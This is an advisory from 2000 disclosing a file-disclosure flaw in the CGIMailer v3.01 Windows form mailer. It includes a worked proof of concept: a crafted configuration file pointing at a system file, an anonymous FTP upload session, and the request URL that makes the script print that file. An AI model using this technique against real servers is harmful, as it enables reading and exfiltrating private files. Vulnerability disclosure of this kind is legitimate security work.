Advisory: CGIMailer v3.01 for Windows 95/98/2000/NT4.0 Chopsui-cide[MmM] The Mad Midget Mafia - http://midgets.box.sk/ ======================================================================= Summary: ========== Date released: 15/03/2000 (dd/mm/yyyy). Risk: reading of private files. Vulnerability found by: Chopsui-cide. Vulnerable: CGIMailer v3.01, probably prior versions (not tested). Immune: ? CGIMailer makes use of configuration files which specify certain variables (address to post to, etc). An attacker can specify his/her own configuration file. Details: ========== Anyone who can execute CGIMailer (anyone who can use the forms that use CGIMailer) can specify what configuration file to use and this can be any file on the system CGIMailer is running on. This allows for the existance of private files to be detected. There are more dangerous implications though: this vulnerability could possibly be exploited to obtain private files from the target system. If there is an FTP server running on the target system on which an attacker has upload priviledges, he/she could upload a malicious configuration file, and then run it using CGIMailer. Configuration files can be used to send files to the attacker via e-mail (among other things). Implementation: ================= To demonstrate this problem, I set up Xitami Webserver + Serv-U FTP 2.5d. The target host is therocksays. We have anonymous FTP access in Serv-U FTP with upload priviledges to the incoming directory, and Xitami will allow us to execute CGI scripts. This is all we will need to execute the attack. Here is the configuration file that will send us the contents of autoexec.bat: GATEWAY=notneeded.com PORT=25 FROM=nobody@isp.com TO=nobody@isp.com SUBJECT=CGIMailer form RESPONSE_TEMPLATE=c:\autoexec.bat REFBASE_ALLOW= Now to upload it... D:\>ftp therocksays Connected to therocksays. 220 Serv-U FTP-Server v2.5d for WinSock ready... User (therocksays:(none)): anonymous 331 User name okay, please send complete E-mail address as password. Password: 230 User logged in, proceed. ftp> dir 200 PORT Command successful. 150 Opening ASCII mode data connection for /bin/ls. drwxrwxrwx 1 user group 0 Mar 15 06:28 incoming 226 Transfer complete. 65 bytes received in 0.00 seconds (65000.00 Kbytes/sec) ftp> cd incoming 250 Directory changed to /d:/ftproot/incoming ftp> put test.cf 200 PORT Command successful. 150 Opening ASCII mode data connection for test.cf. 226 Transfer complete. 150 bytes sent in 0.06 seconds (2.50 Kbytes/sec) ftp> pwd 257 "/d:/ftproot/incoming" is current directory. ftp> Serv-U was even kind enough to give us the local path of the config file. Now all we need to do is point our browser at: http://therocksays/cgi-bin/cgimail?d:\ftproot\incoming\test.cf The contents of autoexec.bat should be listed at the top of the resulting HTML file. This could have been e-mailed as an attachment to any address we wanted. =======================================================================